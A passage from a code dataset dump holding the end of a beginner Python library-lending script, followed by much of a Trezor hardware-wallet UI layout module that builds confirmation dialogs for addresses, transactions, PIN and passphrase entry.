self.lenddict:\n print(f\"\\n{book} is not available because it is lended by {self.lenddict[book]}\")\n else:\n print(f\"\\n{book} is not available in {self.name} Library\")\n def addbook(self,book):\n self.booklist.append(book)\n print(f\"\\n{book} has been added to {self.name} Library\")\n def returnbook(self,book):\n if book in self.lenddict:\n self.lenddict.pop(book)\n self.booklist.append(book)\n print(f\"\\n{book} has been added to {self.name} Library\")\n else:\n print(f\"\\n{book} has not been lended by anyone till now\")\n\nif __name__ == '__main__':\n saurav = Library([\"c++\", \"csa\", \"java\", \"dsa\", \"python\", \"php\"], \"saurav\")\n print(\"\\nWelcome to codewithsaurav Library !\")\n choice='y'\n while(choice==\"y\" or choice==\"Y\"):\n print(\"\\npress 1 : To display all books \")\n print(\"press 2 : To lend books\")\n print(\"press 3 : To add book\")\n print(\"press 4 : To return book\")\n user_inp=input(\"Enter your choice : \")\n if user_inp not in ['1','2','3','4']:\n print(\"\\nplease enter a valid option !\\n\")\n continue\n else:\n user_inp=int(user_inp)\n if user_inp==1:\n saurav.displaybook()\n elif user_inp==2:\n name=input(\"\\nEnter the name of the person who wants to lend a book : \")\n book=input(\"Enter the name of the book you want to lend : \")\n saurav.lendbook(name,book)\n elif user_inp==3:\n book = input(\"\\nEnter the book you want to add : \")\n saurav.addbook(book)\n else:\n book=input(\"\\nEnter the book you want to return : \")\n saurav.returnbook(book)\n choice=input(\"\\npress y or Y to continue or any other key to exit : \")\n\n","repo_name":"sauravganguly2018/Python_Tutorials","sub_path":"mini_proj1.py","file_name":"mini_proj1.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37973308989","text":"from typing import TYPE_CHECKING\n\nfrom trezor import io, loop, ui\nfrom trezor.enums import ButtonRequestType\nfrom trezor.wire import ActionCancelled\n\nimport trezorui2\n\nfrom ..common import button_request, interact\n\nif TYPE_CHECKING:\n from typing import Any, NoReturn, Awaitable, Iterable, Sequence, TypeVar\n\n from trezor.wire import GenericContext, Context\n from ..common import PropertyType, ExceptionType\n\n T = TypeVar(\"T\")\n\n\nCONFIRMED = trezorui2.CONFIRMED\nCANCELLED = trezorui2.CANCELLED\nINFO = trezorui2.INFO\n\nBR_TYPE_OTHER = ButtonRequestType.Other # global_import_cache\n\n\nif __debug__:\n from trezor.utils import DISABLE_ANIMATION\n\n trezorui2.disable_animation(bool(DISABLE_ANIMATION))\n\n\nclass RustLayout(ui.Layout):\n # pylint: disable=super-init-not-called\n def __init__(self, layout: Any):\n self.layout = layout\n self.timer = loop.Timer()\n self.layout.attach_timer_fn(self.set_timer)\n\n def set_timer(self, token: int, deadline: int) -> None:\n self.timer.schedule(deadline, token)\n\n def request_complete_repaint(self) -> None:\n msg = self.layout.request_complete_repaint()\n assert msg is None\n\n def _paint(self) -> None:\n import storage.cache as storage_cache\n\n painted = self.layout.paint()\n\n ui.refresh()\n if storage_cache.homescreen_shown is not None and painted:\n storage_cache.homescreen_shown = None\n\n if __debug__:\n from trezor.enums import DebugPhysicalButton\n\n def create_tasks(self) -> tuple[loop.AwaitableTask, ...]:\n return (\n self.handle_input_and_rendering(),\n self.handle_timers(),\n self.handle_swipe_signal(),\n self.handle_button_signal(),\n self.handle_result_signal(),\n )\n\n async def handle_result_signal(self) -> None:\n \"\"\"Enables sending arbitrary input - ui.Result.\n\n Waits for `result_signal` and carries it out.\n \"\"\"\n from apps.debug import result_signal\n from storage import debug as debug_storage\n\n while True:\n event_id, result = await result_signal()\n # Layout change will be notified in _first_paint of the next layout\n debug_storage.new_layout_event_id = event_id\n raise ui.Result(result)\n\n def read_content_into(self, content_store: list[str]) -> None:\n \"\"\"Reads all the strings/tokens received from Rust into given list.\"\"\"\n\n def callback(*args: Any) -> None:\n for arg in args:\n content_store.append(str(arg))\n\n content_store.clear()\n self.layout.trace(callback)\n\n async def _press_left(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers left button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_LEFT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_LEFT)\n\n async def _press_right(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers right button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_RIGHT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_RIGHT)\n\n async def _press_middle(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers middle button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_LEFT)\n self._paint()\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_RIGHT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_LEFT)\n self._paint()\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_RIGHT)\n\n async def _press_button(\n self,\n event_id: int | None,\n btn_to_press: DebugPhysicalButton,\n hold_ms: int | None,\n ) -> Any:\n from trezor.enums import DebugPhysicalButton\n from trezor import workflow\n from apps.debug import notify_layout_change\n from storage import debug as debug_storage\n\n if btn_to_press == DebugPhysicalButton.LEFT_BTN:\n msg = await self._press_left(hold_ms)\n elif btn_to_press == DebugPhysicalButton.MIDDLE_BTN:\n msg = await self._press_middle(hold_ms)\n elif btn_to_press == DebugPhysicalButton.RIGHT_BTN:\n msg = await self._press_right(hold_ms)\n else:\n raise Exception(f\"Unknown button: {btn_to_press}\")\n\n if msg is not None:\n # Layout change will be notified in _first_paint of the next layout\n debug_storage.new_layout_event_id = event_id\n raise ui.Result(msg)\n\n # So that these presses will keep trezor awake\n # (it will not be locked after auto_lock_delay_ms)\n workflow.idle_timer.touch()\n\n self._paint()\n notify_layout_change(self, event_id)\n\n async def _swipe(self, event_id: int | None, direction: int) -> None:\n \"\"\"Triggers swipe in the given direction.\n\n Only `UP` and `DOWN` directions are supported.\n \"\"\"\n from trezor.enums import DebugPhysicalButton, DebugSwipeDirection\n\n if direction == DebugSwipeDirection.UP:\n btn_to_press = DebugPhysicalButton.RIGHT_BTN\n elif direction == DebugSwipeDirection.DOWN:\n btn_to_press = DebugPhysicalButton.LEFT_BTN\n else:\n raise Exception(f\"Unsupported direction: {direction}\")\n\n await self._press_button(event_id, btn_to_press, None)\n\n async def handle_swipe_signal(self) -> None:\n \"\"\"Enables pagination through the current page/flow page.\n\n Waits for `swipe_signal` and carries it out.\n \"\"\"\n from apps.debug import swipe_signal\n\n while True:\n event_id, direction = await swipe_signal()\n await self._swipe(event_id, direction)\n\n async def handle_button_signal(self) -> None:\n \"\"\"Enables clicking arbitrary of the three buttons.\n\n Waits for `button_signal` and carries it out.\n \"\"\"\n from apps.debug import button_signal\n\n while True:\n event_id, btn, hold_ms = await button_signal()\n await self._press_button(event_id, btn, hold_ms)\n\n else:\n\n def create_tasks(self) -> tuple[loop.AwaitableTask, ...]:\n return self.handle_timers(), self.handle_input_and_rendering()\n\n def _first_paint(self) -> None:\n # Clear the screen of any leftovers.\n ui.display.clear()\n self._paint()\n\n if __debug__ and self.should_notify_layout_change:\n from apps.debug import notify_layout_change\n from storage import debug as debug_storage\n\n # notify about change and do not notify again until next await.\n # (handle_rendering might be called multiple times in a single await,\n # because of the endless loop in __iter__)\n self.should_notify_layout_change = False\n\n # Possibly there is an event ID that caused the layout change,\n # so notifying with this ID.\n event_id = None\n if debug_storage.new_layout_event_id is not None:\n event_id = debug_storage.new_layout_event_id\n debug_storage.new_layout_event_id = None\n\n notify_layout_change(self, event_id)\n\n def handle_input_and_rendering(self) -> loop.Task: # type: ignore [awaitable-is-generator]\n from trezor import workflow\n\n button = loop.wait(io.BUTTON)\n self._first_paint()\n while True:\n # Using `yield` instead of `await` to avoid allocations.\n event, button_num = yield button\n workflow.idle_timer.touch()\n msg = None\n if event in (io.BUTTON_PRESSED, io.BUTTON_RELEASED):\n msg = self.layout.button_event(event, button_num)\n if msg is not None:\n raise ui.Result(msg)\n self._paint()\n\n def handle_timers(self) -> loop.Task: # type: ignore [awaitable-is-generator]\n while True:\n # Using `yield` instead of `await` to avoid allocations.\n token = yield self.timer\n msg = self.layout.timer(token)\n if msg is not None:\n raise ui.Result(msg)\n self._paint()\n\n def page_count(self) -> int:\n \"\"\"How many paginated pages current screen has.\"\"\"\n return self.layout.page_count()\n\n\ndef draw_simple(layout: Any) -> None:\n # Simple drawing not supported for layouts that set timers.\n def dummy_set_timer(token: int, deadline: int) -> None:\n raise RuntimeError\n\n layout.attach_timer_fn(dummy_set_timer)\n ui.display.clear()\n layout.paint()\n ui.refresh()\n\n\n# Temporary function, so we know where it is used\n# Should be gradually replaced by custom designs/layouts\nasync def _placeholder_confirm(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str | None = None,\n description: str | None = None,\n *,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Any:\n return await confirm_action(\n ctx,\n br_type,\n title.upper(),\n data,\n description,\n verb=verb,\n verb_cancel=verb_cancel,\n hold=hold,\n reverse=True,\n br_code=br_code,\n )\n\n\nasync def get_bool(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str | None = None,\n description: str | None = None,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> bool:\n result = await interact(\n ctx,\n RustLayout(\n trezorui2.confirm_action(\n title=title.upper(),\n action=data,\n description=description,\n verb=verb,\n verb_cancel=verb_cancel,\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n\n return result is CONFIRMED\n\n\nasync def raise_if_not_confirmed(a: Awaitable[T], exc: Any = ActionCancelled) -> T:\n result = await a\n if result is not CONFIRMED:\n raise exc\n return result\n\n\nasync def confirm_action(\n ctx: GenericContext,\n br_type: str,\n title: str,\n action: str | None = None,\n description: str | None = None,\n description_param: str | None = None,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n hold_danger: bool = False,\n reverse: bool = False,\n exc: ExceptionType = ActionCancelled,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n if verb_cancel is not None:\n verb_cancel = verb_cancel.upper()\n\n if description is not None and description_param is not None:\n description = description.format(description_param)\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_action(\n title=title.upper(),\n action=action,\n description=description,\n verb=verb.upper(),\n verb_cancel=verb_cancel,\n hold=hold,\n reverse=reverse,\n )\n ),\n br_type,\n br_code,\n ),\n exc,\n )\n\n\nasync def confirm_single(\n ctx: GenericContext,\n br_type: str,\n title: str,\n description: str,\n description_param: str | None = None,\n verb: str | None = None,\n) -> None:\n description_param = description_param or \"\"\n begin, _separator, end = description.partition(\"{}\")\n await confirm_action(\n ctx,\n br_type,\n title,\n description=begin + description_param + end,\n verb=verb or \"CONFIRM\",\n br_code=ButtonRequestType.ProtectCall,\n )\n\n\nasync def confirm_reset_device(\n ctx: GenericContext,\n title: str,\n recovery: bool = False,\n) -> None:\n if recovery:\n button = \"RECOVER WALLET\"\n else:\n button = \"CREATE WALLET\"\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_reset_device(\n title=title.upper(),\n button=button,\n )\n ),\n \"recover_device\" if recovery else \"setup_device\",\n ButtonRequestType.ProtectCall\n if recovery\n else ButtonRequestType.ResetDevice,\n )\n )\n\n\n# TODO cleanup @ redesign\nasync def confirm_backup(ctx: GenericContext) -> bool:\n if await get_bool(\n ctx,\n \"backup_device\",\n \"SUCCESS\",\n description=\"New wallet has been created.\\nIt should be backed up now!\",\n verb=\"BACK UP\",\n verb_cancel=\"SKIP\",\n br_code=ButtonRequestType.ResetDevice,\n ):\n return True\n\n return await get_bool(\n ctx,\n \"backup_device\",\n \"WARNING\",\n \"Are you sure you want to skip the backup?\\n\",\n \"You can back up your Trezor once, at any time.\",\n verb=\"BACK UP\",\n verb_cancel=\"SKIP\",\n br_code=ButtonRequestType.ResetDevice,\n )\n\n\nasync def confirm_path_warning(\n ctx: GenericContext,\n path: str,\n path_type: str | None = None,\n) -> None:\n if path_type:\n title = f\"Unknown {path_type}\"\n else:\n title = \"Unknown path\"\n return await _placeholder_confirm(\n ctx,\n \"path_warning\",\n title.upper(),\n description=path,\n br_code=ButtonRequestType.UnknownDerivationPath,\n )\n\n\nasync def confirm_homescreen(\n ctx: GenericContext,\n image: bytes,\n) -> None:\n # TODO: show homescreen preview?\n await confirm_action(\n ctx,\n \"set_homescreen\",\n \"Set homescreen\",\n description=\"Do you really want to set new homescreen image?\",\n br_code=ButtonRequestType.ProtectCall,\n )\n\n\ndef _show_xpub(xpub: str, title: str, cancel: str | None) -> ui.Layout:\n return RustLayout(\n trezorui2.confirm_blob(\n title=title.upper(),\n data=xpub,\n verb_cancel=cancel,\n description=None,\n extra=None,\n )\n )\n\n\nasync def show_xpub(ctx: GenericContext, xpub: str, title: str) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n _show_xpub(xpub, title, None),\n \"show_xpub\",\n ButtonRequestType.PublicKey,\n )\n )\n\n\nasync def show_address(\n ctx: GenericContext,\n address: str,\n *,\n address_qr: str | None = None,\n case_sensitive: bool = True,\n path: str | None = None,\n account: str | None = None,\n network: str | None = None,\n multisig_index: int | None = None,\n xpubs: Sequence[str] = (),\n) -> None:\n send_button_request = True\n # Will be a marquee in case of multisig\n title = (\n \"RECEIVE ADDRESS (MULTISIG)\"\n if multisig_index is not None\n else \"RECEIVE ADDRESS\"\n )\n while True:\n layout = RustLayout(\n trezorui2.confirm_address(\n title=title,\n data=address,\n description=\"\", # unused on TR\n extra=None, # unused on TR\n )\n )\n if send_button_request:\n send_button_request = False\n await button_request(\n ctx,\n \"show_address\",\n ButtonRequestType.Address,\n pages=layout.page_count(),\n )\n result = await ctx.wait(layout)\n\n # User confirmed with middle button.\n if result is CONFIRMED:\n break\n\n # User pressed right button, go to address details.\n elif result is INFO:\n\n def xpub_title(i: int) -> str:\n # Will be marquee (cannot fit one line)\n result = f\"MULTISIG XPUB #{i + 1}\"\n result += \" (YOURS)\" if i == multisig_index else \" (COSIGNER)\"\n return result\n\n result = await ctx.wait(\n RustLayout(\n trezorui2.show_address_details(\n address=address if address_qr is None else address_qr,\n case_sensitive=case_sensitive,\n account=account,\n path=path,\n xpubs=[(xpub_title(i), xpub) for i, xpub in enumerate(xpubs)],\n )\n ),\n )\n # Can only go back from the address details.\n assert result is CANCELLED\n\n # User pressed left cancel button, show mismatch dialogue.\n else:\n result = await ctx.wait(RustLayout(trezorui2.show_mismatch()))\n assert result in (CONFIRMED, CANCELLED)\n # Right button aborts action, left goes back to showing address.\n if result is CONFIRMED:\n raise ActionCancelled\n\n\ndef show_pubkey(\n ctx: Context, pubkey: str, title: str = \"Confirm public key\"\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n \"show_pubkey\",\n title.upper(),\n pubkey,\n br_code=ButtonRequestType.PublicKey,\n )\n\n\nasync def _show_modal(\n ctx: GenericContext,\n br_type: str,\n header: str,\n subheader: str | None,\n content: str,\n button_confirm: str | None,\n button_cancel: str | None,\n br_code: ButtonRequestType,\n exc: ExceptionType = ActionCancelled,\n) -> None:\n await confirm_action(\n ctx,\n br_type,\n header.upper(),\n subheader,\n content,\n verb=button_confirm or \"\",\n verb_cancel=button_cancel,\n exc=exc,\n br_code=br_code,\n )\n\n\nasync def show_error_and_raise(\n ctx: GenericContext,\n br_type: str,\n content: str,\n header: str = \"Error\",\n subheader: str | None = None,\n button: str = \"Close\",\n red: bool = False, # unused on TR\n exc: ExceptionType = ActionCancelled,\n) -> NoReturn:\n await _show_modal(\n ctx,\n br_type,\n header,\n subheader,\n content,\n button_confirm=None,\n button_cancel=button,\n br_code=BR_TYPE_OTHER,\n exc=exc,\n )\n raise exc\n\n\ndef show_warning(\n ctx: GenericContext,\n br_type: str,\n content: str,\n subheader: str | None = None,\n button: str = \"Try again\",\n br_code: ButtonRequestType = ButtonRequestType.Warning,\n) -> Awaitable[None]:\n return _show_modal(\n ctx,\n br_type,\n \"\",\n subheader or \"WARNING\",\n content,\n button_confirm=button,\n button_cancel=None,\n br_code=br_code,\n )\n\n\ndef show_success(\n ctx: GenericContext,\n br_type: str,\n content: str,\n subheader: str | None = None,\n button: str = \"Continue\",\n) -> Awaitable[None]:\n title = \"Success\"\n\n # In case only subheader is supplied, showing it\n # in regular font, not bold.\n if not content and subheader:\n content = subheader\n subheader = None\n\n # Special case for Shamir backup - to show everything just on one page\n # in regular font.\n if \"Continue with\" in content:\n content = f\"{subheader}\\n{content}\"\n subheader = None\n title = \"\"\n\n return _show_modal(\n ctx,\n br_type,\n title,\n subheader,\n content,\n button_confirm=button,\n button_cancel=None,\n br_code=ButtonRequestType.Success,\n )\n\n\nasync def confirm_output(\n ctx: GenericContext,\n address: str,\n amount: str,\n title: str = \"Confirm sending\",\n hold: bool = False,\n br_code: ButtonRequestType = ButtonRequestType.ConfirmOutput,\n address_label: str | None = None,\n output_index: int | None = None,\n) -> None:\n address_title = (\n \"RECIPIENT\" if output_index is None else f\"RECIPIENT #{output_index + 1}\"\n )\n amount_title = \"AMOUNT\" if output_index is None else f\"AMOUNT #{output_index + 1}\"\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_output(\n address=address,\n address_label=address_label or \"\",\n address_title=address_title,\n amount_title=amount_title,\n amount=amount,\n )\n ),\n \"confirm_output\",\n br_code,\n )\n )\n\n\nasync def tutorial(\n ctx: GenericContext,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n \"\"\"Showing users how to interact with the device.\"\"\"\n await interact(\n ctx,\n RustLayout(trezorui2.tutorial()),\n \"tutorial\",\n br_code,\n )\n\n\nasync def confirm_payment_request(\n ctx: GenericContext,\n recipient_name: str,\n amount: str,\n memos: list[str],\n) -> Any:\n memos_str = \"\\n\".join(memos)\n return await _placeholder_confirm(\n ctx,\n \"confirm_payment_request\",\n \"CONFIRM SENDING\",\n description=f\"{amount} to\\n{recipient_name}\\n{memos_str}\",\n br_code=ButtonRequestType.ConfirmOutput,\n )\n\n\nasync def should_show_more(\n ctx: GenericContext,\n title: str,\n para: Iterable[tuple[int, str]],\n button_text: str = \"Show all\",\n br_type: str = \"should_show_more\",\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n confirm: str | bytes | None = None,\n) -> bool:\n \"\"\"Return True if the user wants to show more (they click a special button)\n and False when the user wants to continue without showing details.\n\n Raises ActionCancelled if the user cancels.\n \"\"\"\n if confirm is None or not isinstance(confirm, str):\n confirm = \"CONFIRM\"\n\n result = await interact(\n ctx,\n RustLayout(\n trezorui2.confirm_with_info(\n title=title.upper(),\n items=para,\n button=confirm.upper(),\n info_button=button_text.upper(),\n )\n ),\n br_type,\n br_code,\n )\n\n if result is CONFIRMED:\n return False\n elif result is INFO:\n return True\n else:\n assert result is CANCELLED\n raise ActionCancelled\n\n\nasync def confirm_blob(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: bytes | str,\n description: str | None = None,\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n ask_pagination: bool = False,\n) -> None:\n title = title.upper()\n description = description or \"\"\n layout = RustLayout(\n trezorui2.confirm_blob(\n title=title,\n description=description,\n data=data,\n extra=None,\n hold=hold,\n )\n )\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n layout,\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_address(\n ctx: GenericContext,\n title: str,\n address: str,\n description: str | None = \"Address:\",\n br_type: str = \"confirm_address\",\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n br_type,\n title.upper(),\n address,\n description,\n br_code=br_code,\n )\n\n\nasync def confirm_text(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str,\n description: str | None = None,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Any:\n return await _placeholder_confirm(\n ctx,\n br_type,\n title,\n data,\n description,\n br_code=br_code,\n )\n\n\ndef confirm_amount(\n ctx: GenericContext,\n title: str,\n amount: str,\n description: str = \"Amount:\",\n br_type: str = \"confirm_amount\",\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n br_type,\n title.upper(),\n amount,\n description,\n br_code=br_code,\n )\n\n\nasync def confirm_properties(\n ctx: GenericContext,\n br_type: str,\n title: str,\n props: Iterable[PropertyType],\n hold: bool = False,\n br_code: ButtonRequestType = ButtonRequestType.ConfirmOutput,\n) -> None:\n from ubinascii import hexlify\n\n def handle_bytes(prop: PropertyType):\n if isinstance(prop[1], bytes):\n return (prop[0], hexlify(prop[1]).decode(), True)\n else:\n # When there is not space in the text, taking it as data\n # to not include hyphens\n is_data = prop[1] and \" \" not in prop[1]\n return (prop[0], prop[1], is_data)\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_properties(\n title=title.upper(),\n items=map(handle_bytes, props), # type: ignore [cannot be assigned to parameter \"items\"]\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\ndef confirm_value(\n ctx: GenericContext,\n title: str,\n value: str,\n description: str,\n br_type: str,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n *,\n verb: str | None = None,\n hold: bool = False,\n) -> Awaitable[None]:\n \"\"\"General confirmation dialog, used by many other confirm_* functions.\"\"\"\n\n if not verb and not hold:\n raise ValueError(\"Either verb or hold=True must be set\")\n\n return raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_value( # type: ignore [Argument missing for parameter \"subtitle\"]\n title=title.upper(),\n description=description,\n value=value,\n verb=verb or \"HOLD TO CONFIRM\",\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_total(\n ctx: GenericContext,\n total_amount: str,\n fee_amount: str,\n fee_rate_amount: str | None = None,\n title: str = \"SENDING\",\n total_label: str = \"TOTAL AMOUNT\",\n fee_label: str = \"Including fee:\",\n account_label: str | None = None,\n br_type: str = \"confirm_total\",\n br_code: ButtonRequestType = ButtonRequestType.SignTx,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n # TODO: resolve these differences in TT's and TR's confirm_total\n trezorui2.confirm_total( # type: ignore [Arguments missing]\n total_amount=total_amount, # type: ignore [No parameter named]\n fee_amount=fee_amount, # type: ignore [No parameter named]\n fee_rate_amount=fee_rate_amount, # type: ignore [No parameter named]\n account_label=account_label, # type: ignore [No parameter named]\n total_label=total_label.upper(), # type: ignore [No parameter named]\n fee_label=fee_label, # type: ignore [No parameter named]\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_joint_total(\n ctx: GenericContext, spending_amount: str, total_amount: str\n) -> None:\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_joint_total(\n spending_amount=spending_amount,\n total_amount=total_amount,\n )\n ),\n \"confirm_joint_total\",\n ButtonRequestType.SignTx,\n )\n )\n\n\nasync def confirm_metadata(\n ctx: GenericContext,\n br_type: str,\n title: str,\n content: str,\n param: str | None = None,\n br_code: ButtonRequestType = ButtonRequestType.SignTx,\n hold: bool = False,\n) -> None:\n await _placeholder_confirm(\n ctx,\n br_type,\n title.upper(),\n description=content.format(param),\n hold=hold,\n br_code=br_code,\n )\n\n\nasync def confirm_replacement(ctx: GenericContext, description: str, txid: str) -> None:\n await confirm_value(\n ctx,\n description.upper(),\n txid,\n \"Confirm transaction ID:\",\n \"confirm_replacement\",\n ButtonRequestType.SignTx,\n verb=\"CONFIRM\",\n )\n\n\nasync def confirm_modify_output(\n ctx: GenericContext,\n address: str,\n sign: int,\n amount_change: str,\n amount_new: str,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_modify_output(\n address=address,\n sign=sign,\n amount_change=amount_change,\n amount_new=amount_new,\n )\n ),\n \"modify_output\",\n ButtonRequestType.ConfirmOutput,\n )\n )\n\n\nasync def confirm_modify_fee(\n ctx: GenericContext,\n title: str,\n sign: int,\n user_fee_change: str,\n total_fee_new: str,\n fee_rate_amount: str | None = None,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_modify_fee(\n title=title,\n sign=sign,\n user_fee_change=user_fee_change,\n total_fee_new=total_fee_new,\n fee_rate_amount=fee_rate_amount,\n )\n ),\n \"modify_fee\",\n ButtonRequestType.SignTx,\n )\n )\n\n\nasync def confirm_coinjoin(\n ctx: GenericContext, max_rounds: int, max_fee_per_vbyte: str\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_coinjoin(\n max_rounds=str(max_rounds),\n max_feerate=max_fee_per_vbyte,\n )\n ),\n \"coinjoin_final\",\n BR_TYPE_OTHER,\n )\n )\n\n\n# TODO cleanup @ redesign\nasync def confirm_sign_identity(\n ctx: GenericContext, proto: str, identity: str, challenge_visual: str | None\n) -> None:\n text = \"\"\n if challenge_visual:\n text += f\"{challenge_visual}\\n\\n\"\n text += identity\n\n await _placeholder_confirm(\n ctx,\n \"confirm_sign_identity\",\n f\"Sign {proto}\".upper(),\n text,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def confirm_signverify(\n ctx: GenericContext, coin: str, message: str, address: str, verify: bool\n) -> None:\n if verify:\n header = f\"Verify {coin} message\"\n br_type = \"verify_message\"\n else:\n header = f\"Sign {coin} message\"\n br_type = \"sign_message\"\n\n await confirm_blob(\n ctx,\n br_type,\n header.upper(),\n address,\n \"Confirm address:\",\n br_code=BR_TYPE_OTHER,\n )\n\n await confirm_value(\n ctx,\n header.upper(),\n message,\n \"Confirm message:\",\n br_type,\n BR_TYPE_OTHER,\n verb=\"CONFIRM\",\n )\n\n\nasync def show_error_popup(\n title: str,\n description: str,\n subtitle: str | None = None,\n description_param: str = \"\",\n *,\n button: str = \"\",\n timeout_ms: int = 0,\n) -> None:\n if button:\n raise NotImplementedError(\"Button not implemented\")\n description = description.format(description_param)\n if subtitle:\n description = f\"{subtitle}\\n{description}\"\n await RustLayout(\n trezorui2.show_info(\n title=title,\n description=description,\n time_ms=timeout_ms,\n )\n )\n\n\ndef request_passphrase_on_host() -> None:\n draw_simple(\n trezorui2.show_info(\n title=\"HIDDEN WALLET\",\n description=\"Please type your passphrase on the connected host.\",\n )\n )\n\n\nasync def request_passphrase_on_device(ctx: GenericContext, max_len: int) -> str:\n await button_request(\n ctx, \"passphrase_device\", code=ButtonRequestType.PassphraseEntry\n )\n\n result = await ctx.wait(\n RustLayout(\n trezorui2.request_passphrase(\n prompt=\"ENTER PASSPHRASE\",\n max_len=max_len,\n )\n )\n )\n if result is CANCELLED:\n raise ActionCancelled(\"Passphrase entry cancelled\")\n\n assert isinstance(result, str)\n return result\n\n\nasync def request_pin_on_device(\n ctx: GenericContext,\n prompt: str,\n attempts_remaining: int | None,\n allow_cancel: bool,\n wrong_pin: bool = False,\n) -> str:\n from trezor import wire\n\n # Not showing the prompt in case user did not enter it badly yet\n # (has full 16 attempts left)\n if attempts_remaining is None or attempts_remaining == 16:\n subprompt = \"\"\n elif attempts_remaining == 1:\n subprompt = \"Last attempt\"\n else:\n subprompt = f\"{attempts_remaining} tries left\"\n\n await button_request(ctx, \"pin_device\", code=ButtonRequestType.PinEntry)\n\n dialog = RustLayout(\n trezorui2.request_pin(\n prompt=prompt,\n subprompt=subprompt,\n allow_cancel=allow_cancel,\n wrong_pin=wrong_pin,\n )\n )\n\n result = await ctx.wait(dialog)\n if result is CANCELLED:\n raise wire.PinCancelled\n assert isinstance(result, str)\n return result\n\n\nasync def confirm_reenter_pin(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n br_type = \"reenter_wipe_code\" if is_wipe_code else \"reenter_pin\"\n title = \"CHECK WIPE CODE\" if is_wipe_code else \"CHECK PIN\"\n return await confirm_action(\n ctx,\n br_type,\n title,\n action=\"Please re-enter to confirm.\",\n verb=\"BEGIN\",\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def pin_mismatch_popup(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n title = \"WIPE CODE MISMATCH\" if is_wipe_code else \"PIN MISMATCH\"\n description = \"wipe codes\" if is_wipe_code else \"PINs\"\n return await confirm_action(\n ctx,\n \"pin_mismatch\",\n title,\n description=f\"The {description} you entered do not match.\\nPlease try again.\",\n verb=\"TRY AGAIN\",\n verb_cancel=None,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def wipe_code_same_as_pin_popup(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n return await confirm_action(\n ctx,\n \"wipe_code_same_as_pin\",\n \"INVALID WIPE CODE\",\n description=\"The wipe code must be different from your PIN.\\nPlease try again.\",\n verb=\"TRY AGAIN\",\n verb_cancel=None,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def confirm_set_new_pin(\n ctx: GenericContext,\n br_type: str,\n title: str,\n description: str,\n information: list[str],\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n await confirm_action(\n ctx,\n br_type,\n title,\n description=description,\n verb=\"ENABLE\",\n br_code=br_code,\n )\n\n # Additional information for the user to know about PIN/WIPE CODE\n\n if \"wipe_code\" in br_type:\n verb = \"HODL TO BEGIN\" # Easter egg from 